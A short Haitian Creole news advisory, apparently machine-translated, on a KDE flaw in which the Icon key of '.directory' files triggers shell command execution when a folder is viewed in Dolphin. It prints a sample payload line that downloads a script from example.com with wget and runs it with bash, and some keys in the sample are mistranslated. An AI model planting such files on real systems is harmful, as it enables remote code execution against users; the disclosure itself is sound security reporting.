Nan KDE , ki pèmèt yon atakè egzekite kòmandman abitrè lè yon itilizatè wè yon anyè oswa yon achiv ki gen fichye ".desktop" ak ".directory" ki fèt espesyalman. Yon atak mande pou itilizatè a tou senpleman gade yon lis dosye nan manadjè fichye Dolphin, telechaje yon fichye Desktop move, oswa trennen yon chemen kout sou Desktop la oswa nan yon dokiman. Pwoblèm nan manifeste tèt li nan lage aktyèl la nan bibliyotèk ak ansyen vèsyon, jiska KDE 4. Vilnerabilite a toujou (CVE pa plase).
Pwoblèm nan koze pa yon egzekisyon kòrèk nan klas KDesktopFile, ki, lè yo trete varyab "Icon" la, san yo pa chape kòrèk, pase valè a nan fonksyon KConfigPrivate::expandString(), ki fè ekspansyon karaktè espesyal kokiy yo, ki gen ladan pwosesis. fisèl yo "$(..)" kòm kòmandman yo dwe egzekite . Kontrèman ak kondisyon ki nan spesifikasyon XDG, aplikasyon an konstriksyon koki yo pwodui san yo pa separe kalite anviwònman yo, i.e. pa sèlman lè w ap detèmine liy lòd aplikasyon an dwe lanse, men tou, lè w presize ikon yo parèt pa default.
Pou egzanp, atake voye itilizatè a yon achiv postal ak yon anyè ki gen yon fichye ".directory" tankou:
[Entre Desktop]
Kalite = Anyè
Icône[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Lè w eseye wè sa ki nan achiv la nan manadjè dosye Dolphin, script https://example.com/FILENAME.sh pral telechaje epi egzekite.
Sous: opennet.ru